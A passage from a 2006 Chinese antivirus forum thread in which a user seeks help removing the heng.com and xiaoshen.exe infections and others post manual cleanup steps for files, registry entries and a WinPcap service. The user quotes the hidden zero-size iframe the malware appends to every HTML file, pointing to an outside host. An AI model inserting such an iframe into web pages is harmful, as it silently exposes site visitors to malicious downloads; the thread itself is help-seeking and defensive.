【求助】heng.com和xiaoshen.exe怎么杀？急~~

瑞星卡卡安全论坛技术交流区 反病毒/反流氓软件论坛【求助】heng.com和xiaoshen.exe怎么杀？急~~

	瑞星“1+2”全新解决方案巡展在广州画上圆满句号		叶院长揭秘：瑞星如何运用AI技术革新网络安全		俄乌冲突加剧网络攻击风险白俄罗斯政府遭APT攻击		瑞星ESM防病毒系统助力矿业大学筑牢网络安全防线
	实力拉满瑞星第五十次通过VB100测评		携手老友，拥抱新精彩 —— 新论坛新活动，感谢你的陪伴		护航司法，瑞星助力山西省高院构建安全防线		人工智能在网络安全领域的风险和机遇

1 23

3 / 3 页

跳转页

EvilSpirit 初生襁褓狮帖子:141 注册: 2005-02-21 来自:	发表于： 2006-11-08 14:22 \| 只看楼主短消息资料字号：小中大 21楼顶帮分析下扫描日志啊
EvilSpirit 初生襁褓狮帖子:141 注册: 2005-02-21 来自:

EvilSpirit 初生襁褓狮帖子:141 注册: 2005-02-21 来自:	发表于： 2006-11-08 15:04 \| 只看楼主短消息资料字号：小中大 22楼就没人帮忙分析下嘛？求求拉
EvilSpirit 初生襁褓狮帖子:141 注册: 2005-02-21 来自:

高歌猛进初生襁褓狮帖子:2377 注册: 2006-10-09 来自:	发表于： 2006-11-08 15:10 \| 短消息资料字号：小中大 23楼
高歌猛进初生襁褓狮帖子:2377 注册: 2006-10-09 来自:

EvilSpirit 初生襁褓狮帖子:141 注册: 2005-02-21 来自:	发表于： 2006-11-08 15:32 \| 只看楼主短消息资料字号：小中大 24楼用什么工具修复啊？怎么修复这些选项我显示隐藏文件了，可是我各个磁盘下没有xiaoshen.exe Autorun.inf两个文件
EvilSpirit 初生襁褓狮帖子:141 注册: 2005-02-21 来自:

初生襁褓狮

帖子:236
注册: 2006-09-03
来自:

发表于： 2006-11-08 15:36 | 短消息资料

字号：小中大 25楼

引用:

【高歌猛进的贴子】

修复:
New0 / New0]
<\??\C:\WINDOWS\System32\new.sys><N/A>

<{F1363CDF-3CDF-1368-DF13-CDF36CDF1368}><C:\Program Files\Common Files\Microsoft Shared\MSINFO\3CDF1368.dll> [N/A]
重启,删除
C:\WINDOWS\System32\new.sys
[13332375 / 13332375]
<C:\WINDOWS\SYSTEM32\DRIVERS\13332375.SYS><N/A>
C:\Program Files\Common Files\Microsoft Shared\MSINFO\3CDF1368.dll>
显示隐藏文件,右键打开各分区,删去xiaoshen.exe Autorun.inf

………………

高手1

EvilSpirit 初生襁褓狮帖子:141 注册: 2005-02-21 来自:	发表于： 2006-11-08 16:07 \| 只看楼主短消息资料字号：小中大 26楼怎么修复啊～！我把那几个东西都删了，可还是不行啊，双击盘符不能马上进入要等一会儿，瑞星蹦出xiaoshen.exe修改注册表的提示，点拒绝后再过一会儿才能打开磁盘
EvilSpirit 初生襁褓狮帖子:141 注册: 2005-02-21 来自:

爱好者－1 初生襁褓狮帖子:19 注册: 2006-11-06 来自:	发表于： 2006-11-08 16:22 \| 短消息资料字号：小中大 27楼去4、在运行－regedit，搜索 xiaoshen.exe 那个服务删除
爱好者－1 初生襁褓狮帖子:19 注册: 2006-11-06 来自:

EvilSpirit 初生襁褓狮帖子:141 注册: 2005-02-21 来自:	发表于： 2006-11-08 16:33 \| 只看楼主短消息资料字号：小中大 28楼还是没明白，5555～ C:\Program Files\Common Files\Microsoft Shared\MSINFO\3CDF1368.dll 文件不能删除啊
EvilSpirit 初生襁褓狮帖子:141 注册: 2005-02-21 来自:

EvilSpirit 初生襁褓狮帖子:141 注册: 2005-02-21 来自:	发表于： 2006-11-08 16:50 \| 只看楼主短消息资料字号：小中大 29楼都删了，除了3CDF1368.dll 现在双击可以打开磁盘了，但是Trojan.InjectCode.a病毒还是每次开机都出现，这个是什么病毒啊？附在QQ文件夹小的，是xiaoshen的update给QQ下的嘛？还有，heng.com使得所有htm html文件都会在末段添加如下代码: <iframe src="http://qq.ee28.cn/htm/" width="0" height="0" frameborder="0"></iframe> 这个怎么解决啊？不会只能手工一个个文件打开把这段代码删除吧？
EvilSpirit 初生襁褓狮帖子:141 注册: 2005-02-21 来自:

安全防卫飘泊而立狮帖子:699 注册: 2006-01-14 来自:	发表于： 2006-11-11 13:47 \| 短消息资料字号：小中大 30楼 Remote Packet Capture Protocol v.0 (experimental) / rpcapd] <"C:\Program Files\WinPcap\rpcapd.exe" -d -f "C:\Program Files\WinPcap\rpcapd.ini"><N/A> 这个服务说明了你被黑客远程控制了。。开始→运行→输入services.msc，打开“服务”→查找Remote Packet Capture Protocol v.0→双击→启动类型→禁止→停止→应用→确定。禁止Remote Packet Capture Protocol v.0这个服务重启后删除 "%ProgramFiles%\WinPcap\rpcapd.ini 注册表里查看了一下.发现注册表里也有这么一个文件.我就把整个文件项给删了. 放心去删, 本人亲自试验过. 被黑后网速特别慢.
安全防卫飘泊而立狮帖子:699 注册: 2006-01-14 来自:

<<上一主题|下一主题>>

1 23

3 / 3 页

跳转页

瑞星卡卡安全论坛技术交流区反病毒/反流氓软件论坛 【求助】heng.com和xiaoshen.exe怎么杀？急~~

【求助】heng.com和xiaoshen.exe怎么杀？急~~

瑞星卡卡安全论坛技术交流区反病毒/反流氓软件论坛【求助】heng.com和xiaoshen.exe怎么杀？急~~